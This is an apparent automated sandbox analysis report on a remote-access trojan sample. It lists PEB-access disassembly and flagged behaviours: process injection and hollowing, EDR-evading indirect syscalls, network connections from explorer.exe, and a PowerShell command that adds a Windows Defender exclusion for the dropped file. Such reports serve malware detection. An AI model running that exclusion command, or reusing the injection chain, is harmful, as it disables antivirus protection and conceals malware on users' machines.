Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CA38 mov eax, dword ptr fs:[00000030h]	7_2_0116CA38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CA24 mov eax, dword ptr fs:[00000030h]	7_2_0116CA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01160A50 mov eax, dword ptr fs:[00000030h]	7_2_01160A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140A5B mov eax, dword ptr fs:[00000030h]	7_2_01140A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140A5B mov eax, dword ptr fs:[00000030h]	7_2_01140A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142A45 mov eax, dword ptr fs:[00000030h]	7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142A45 mov eax, dword ptr fs:[00000030h]	7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142A45 mov eax, dword ptr fs:[00000030h]	7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACA72 mov eax, dword ptr fs:[00000030h]	7_2_011ACA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACA72 mov eax, dword ptr fs:[00000030h]	7_2_011ACA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CA6F mov eax, dword ptr fs:[00000030h]	7_2_0116CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CA6F mov eax, dword ptr fs:[00000030h]	7_2_0116CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CA6F mov eax, dword ptr fs:[00000030h]	7_2_0116CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168A90 mov edx, dword ptr fs:[00000030h]	7_2_01168A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112EA80 mov eax, dword ptr fs:[00000030h]	7_2_0112EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112EA80 mov eax, dword ptr fs:[00000030h]	7_2_0112EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138AA0 mov eax, dword ptr fs:[00000030h]	7_2_01138AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138AA0 mov eax, dword ptr fs:[00000030h]	7_2_01138AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01186AA4 mov eax, dword ptr fs:[00000030h]	7_2_01186AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130AD0 mov eax, dword ptr fs:[00000030h]	7_2_01130AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164AD0 mov eax, dword ptr fs:[00000030h]	7_2_01164AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164AD0 mov eax, dword ptr fs:[00000030h]	7_2_01164AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01186ACC mov eax, dword ptr fs:[00000030h]	7_2_01186ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01186ACC mov eax, dword ptr fs:[00000030h]	7_2_01186ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01186ACC mov eax, dword ptr fs:[00000030h]	7_2_01186ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116AAEE mov eax, dword ptr fs:[00000030h]	7_2_0116AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116AAEE mov eax, dword ptr fs:[00000030h]	7_2_0116AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01126D10 mov eax, dword ptr fs:[00000030h]	7_2_01126D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01126D10 mov eax, dword ptr fs:[00000030h]	7_2_01126D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01126D10 mov eax, dword ptr fs:[00000030h]	7_2_01126D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164D1D mov eax, dword ptr fs:[00000030h]	7_2_01164D1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114AD00 mov eax, dword ptr fs:[00000030h]	7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114AD00 mov eax, dword ptr fs:[00000030h]	7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114AD00 mov eax, dword ptr fs:[00000030h]	7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B8D20 mov eax, dword ptr fs:[00000030h]	7_2_011B8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130D59 mov eax, dword ptr fs:[00000030h]	7_2_01130D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130D59 mov eax, dword ptr fs:[00000030h]	7_2_01130D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130D59 mov eax, dword ptr fs:[00000030h]	7_2_01130D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h]	7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h]	7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h]	7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h]	7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h]	7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CDB1 mov ecx, dword ptr fs:[00000030h]	7_2_0116CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CDB1 mov eax, dword ptr fs:[00000030h]	7_2_0116CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CDB1 mov eax, dword ptr fs:[00000030h]	7_2_0116CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01158DBF mov eax, dword ptr fs:[00000030h]	7_2_01158DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01158DBF mov eax, dword ptr fs:[00000030h]	7_2_01158DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01166DA0 mov eax, dword ptr fs:[00000030h]	7_2_01166DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EDD3 mov eax, dword ptr fs:[00000030h]	7_2_0115EDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EDD3 mov eax, dword ptr fs:[00000030h]	7_2_0115EDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4DD7 mov eax, dword ptr fs:[00000030h]	7_2_011B4DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4DD7 mov eax, dword ptr fs:[00000030h]	7_2_011B4DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115CDF0 mov eax, dword ptr fs:[00000030h]	7_2_0115CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115CDF0 mov ecx, dword ptr fs:[00000030h]	7_2_0115CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01150DE1 mov eax, dword ptr fs:[00000030h]	7_2_01150DE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CDEA mov eax, dword ptr fs:[00000030h]	7_2_0112CDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CDEA mov eax, dword ptr fs:[00000030h]	7_2_0112CDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h]	7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h]	7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h]	7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h]	7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4C0F mov eax, dword ptr fs:[00000030h]	7_2_011B4C0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CC00 mov eax, dword ptr fs:[00000030h]	7_2_0116CC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112EC20 mov eax, dword ptr fs:[00000030h]	7_2_0112EC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136C50 mov eax, dword ptr fs:[00000030h]	7_2_01136C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136C50 mov eax, dword ptr fs:[00000030h]	7_2_01136C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136C50 mov eax, dword ptr fs:[00000030h]	7_2_01136C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164C59 mov eax, dword ptr fs:[00000030h]	7_2_01164C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01150C44 mov eax, dword ptr fs:[00000030h]	7_2_01150C44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01150C44 mov eax, dword ptr fs:[00000030h]	7_2_01150C44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113CC74 mov eax, dword ptr fs:[00000030h]	7_2_0113CC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128C8D mov eax, dword ptr fs:[00000030h]	7_2_01128C8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01158CB1 mov eax, dword ptr fs:[00000030h]	7_2_01158CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01158CB1 mov eax, dword ptr fs:[00000030h]	7_2_01158CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4CA8 mov eax, dword ptr fs:[00000030h]	7_2_011B4CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACCA0 mov ecx, dword ptr fs:[00000030h]	7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACCA0 mov eax, dword ptr fs:[00000030h]	7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACCA0 mov eax, dword ptr fs:[00000030h]	7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACCA0 mov eax, dword ptr fs:[00000030h]	7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128CD0 mov eax, dword ptr fs:[00000030h]	7_2_01128CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142CDC mov eax, dword ptr fs:[00000030h]	7_2_01142CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142CDC mov eax, dword ptr fs:[00000030h]	7_2_01142CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142CDC mov eax, dword ptr fs:[00000030h]	7_2_01142CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CCC8 mov eax, dword ptr fs:[00000030h]	7_2_0112CCC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h]	7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h]	7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h]	7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h]	7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132F12 mov eax, dword ptr fs:[00000030h]	7_2_01132F12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CF1F mov eax, dword ptr fs:[00000030h]	7_2_0116CF1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01174F03 mov eax, dword ptr fs:[00000030h]	7_2_01174F03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EF28 mov eax, dword ptr fs:[00000030h]	7_2_0115EF28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CF50 mov eax, dword ptr fs:[00000030h]	7_2_0116CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AF42 mov eax, dword ptr fs:[00000030h]	7_2_0113AF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AF42 mov eax, dword ptr fs:[00000030h]	7_2_0113AF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AF42 mov eax, dword ptr fs:[00000030h]	7_2_0113AF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4F40 mov eax, dword ptr fs:[00000030h]	7_2_011B4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4F40 mov eax, dword ptr fs:[00000030h]	7_2_011B4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4F40 mov eax, dword ptr fs:[00000030h]	7_2_011B4F40

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_00722E62 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

15_2_00722E62

Enables debug privileges

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00726510 SetUnhandledExceptionFilter,		15_2_00726510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_007261C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		15_2_007261C0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 157.53.227.1 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.134.182 80			Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtQueueApcThread: Indirect: 0xFEA4F2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtClose: Indirect: 0x111A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtQueueApcThread: Indirect: 0x111A4F2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtClose: Indirect: 0xFEA56C

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 4004	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 4004	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 4004	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 720000			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 720000			Jump to behavior

